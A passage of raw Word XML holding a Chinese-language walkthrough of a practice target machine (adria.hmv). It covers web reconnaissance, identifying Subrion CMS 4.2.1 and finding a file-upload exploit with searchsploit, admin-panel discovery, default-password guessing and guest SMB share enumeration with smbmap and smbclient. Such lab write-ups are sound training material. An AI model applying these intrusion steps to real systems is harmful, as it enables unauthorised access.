        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00220DBE" w:rsidRPr="00220DBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>changelog.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E85D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00220DBE" w:rsidRPr="00220DBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidR="00E85D27">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidR="00220DBE" w:rsidRPr="00220DBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>panel</w:t>
      </w:r>
      <w:r w:rsidR="00220DBE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00A3053F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问尝试</w:t>
      </w:r>
      <w:r w:rsidR="00F90174">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现无法访问，</w:t>
      </w:r>
      <w:r w:rsidR="00A3053F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这是因为访问</w:t>
      </w:r>
      <w:r w:rsidR="00A3053F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.173</w:t>
      </w:r>
      <w:r w:rsidR="00A3053F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>被重定向到了域名</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adria.h</w:t>
      </w:r>
      <w:r w:rsidR="00CA7341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>mv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，但是</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dns</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>无法正确解析该域名导致的，只需要在</w:t>
      </w:r>
      <w:r w:rsidR="00012FEE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012FEE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012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/hosts</w:t>
      </w:r>
      <w:r w:rsidR="00012FEE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>中添加一行</w:t>
      </w:r>
      <w:r w:rsidR="00CF1598">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.6.173 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CF1598">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>adria.hm</w:t>
      </w:r>
      <w:r w:rsidR="00CA7341">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CF1598">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>即可。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F3E904" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00096EC8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4718D90" wp14:editId="4DB7B2DE">
            <wp:extent cx="5274310" cy="1005840"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="20917247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2478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6B2E" w14:textId="58DDF349" w:rsidR="00096EC8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3</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30D48D" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="000D046A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A898FA3" wp14:editId="3EF0410F">
            <wp:extent cx="5274310" cy="1719580"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="15774634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6340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0510" w14:textId="290E3014" w:rsidR="004F2309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4</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="237928C3" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00A3053F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1976853" wp14:editId="7D9A6EC5">
            <wp:extent cx="3931365" cy="2766060"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1248231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31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451" cy="27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8DA1" w14:textId="4D857418" w:rsidR="00A3053F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5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6705A2" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00CA7341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05720F4" wp14:editId="7986DF23">
            <wp:extent cx="5067300" cy="3448050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="87656146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61469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7DF8" w14:textId="0FBA2FC5" w:rsidR="00CA7341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6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF7A42" w14:textId="778E9AF7" w:rsidR="00CA7341" w:rsidRDefault="00CA7341" w:rsidP="0023276C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访问后发现</w:t>
      </w:r>
      <w:r w:rsidR="006B79DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>license.txt</w:t>
      </w:r>
      <w:r w:rsidR="006B79DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="006B79DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>GNU</w:t>
      </w:r>
      <w:r w:rsidR="006B79DE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的许可，无用；</w:t>
      </w:r>
      <w:r w:rsidR="00F92880">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>changelog.txt</w:t>
      </w:r>
      <w:r w:rsidR="00F92880">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是一个</w:t>
      </w:r>
      <w:r w:rsidR="00E70CD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>更新日志，能够看出存在一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E70CD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Subrion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E70CD5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMS</w:t>
      </w:r>
      <w:r w:rsidR="006A7CB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>应用，往后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="006A7CB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>翻发现</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="006A7CB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>其更新到了</w:t>
      </w:r>
      <w:r w:rsidR="006A7CB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>4.2.1</w:t>
      </w:r>
      <w:r w:rsidR="006A7CB7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本。</w:t>
      </w:r>
      <w:r w:rsidR="000D046A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>搜索一下</w:t>
      </w:r>
      <w:r w:rsidR="00CD1DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>该版本是否存在漏洞，命令行输入命令</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CD1DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD1DA7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="00CD1DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Subrion</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CD1DA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> CMS 4.2.1</w:t>
      </w:r>
      <w:r w:rsidR="00BD3FA7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现其存在一个可利用的文件上传</w:t>
      </w:r>
      <w:r w:rsidR="00776765">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
      <w:r w:rsidR="005757A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00572E47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看该脚本发现需要指定</w:t>
      </w:r>
      <w:r w:rsidR="00572E47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00572E47">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、用户名和密码</w:t>
      </w:r>
      <w:r w:rsidR="005757A8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E21F25" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00F92880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281503B" wp14:editId="0856DEE0">
            <wp:extent cx="5274310" cy="2017395"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1905"/>
            <wp:docPr id="466560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601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6BAE" w14:textId="1838B8A1" w:rsidR="00F92880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7</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4AE4D2" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="006A7CB7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FCD3016" wp14:editId="2DBAA318">
            <wp:extent cx="5133975" cy="1933575"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1631890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90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E65E" w14:textId="102F27C2" w:rsidR="000D046A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8</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="770877FF" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00BD3FA7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A42F960" wp14:editId="7A9DA15E">
            <wp:extent cx="5274310" cy="661670"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="163584063" name="图片 1" descr="矩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4063" name="图片 1" descr="矩形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B796" w14:textId="3A29502F" w:rsidR="00BD3FA7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9</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B57892" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00572E47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5118C08" wp14:editId="5930DE8C">
            <wp:extent cx="5172075" cy="1495425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="162420949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09496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A89" w14:textId="442936EF" w:rsidR="005757A8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10</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8FADB0" w14:textId="08F94049" w:rsidR="00776765" w:rsidRDefault="00FA192E" w:rsidP="000D046A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访问</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>robots.txt</w:t>
      </w:r>
      <w:r w:rsidR="00C44D72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，分别访问这几个路径后发现</w:t>
      </w:r>
      <w:r w:rsidR="00C44D72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>panel</w:t>
      </w:r>
      <w:r w:rsidR="00C44D72">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是后台</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>登录地址，</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>web</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>路径扫描也发现</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>panel</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是返回</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r w:rsidR="0021257A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>状态码可以访问到，访问</w:t>
      </w:r>
      <w:r w:rsidR="00013F58">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>后</w:t>
      </w:r>
      <w:r w:rsidR="00314023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>尝试几个简单的登录密码</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00314023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>admin:admin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00314023">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>等并未成功登录。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF6351" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00C44D72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10254E0" wp14:editId="2E6E47CF">
            <wp:extent cx="5248275" cy="2000250"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="30895068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50685" name="图片 1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632D" w14:textId="58337BE6" w:rsidR="00C44D72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11</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AE25E1" w14:textId="77777777" w:rsidR="00A96360" w:rsidRDefault="00013F58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C832D46" wp14:editId="6A3AD75B">
            <wp:extent cx="5274310" cy="3886835"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="30596996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69964" name="图片 1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1E9B" w14:textId="75D960B9" w:rsidR="00013F58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12</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E37B543" w14:textId="2008B64D" w:rsidR="00F84AA5" w:rsidRDefault="00F84AA5" w:rsidP="00FA192E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FA192E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收集</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00770BD4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smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00770BD4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共享文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7E2449" w14:textId="6CD24601" w:rsidR="00F87F59" w:rsidRPr="00E743E9" w:rsidRDefault="00090E62" w:rsidP="00E743E9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02319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看靶机开放的端口是否存在可</w:t>
      </w:r>
      <w:r w:rsidR="00902319" w:rsidRPr="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查看的敏感文件，命令行输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00902319" w:rsidRPr="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00902319" w:rsidRPr="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -H 192.168.6.173 -u guest</w:t>
      </w:r>
      <w:r w:rsidR="00902319">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="005449B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发现可以访问</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005449B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>DebianShare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005449B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这个文件，利用</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005449B0">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E743E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>获取，输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E743E9" w:rsidRPr="00E743E9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>smbclient</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E743E9" w:rsidRPr="00E743E9">
        <w:rPr>
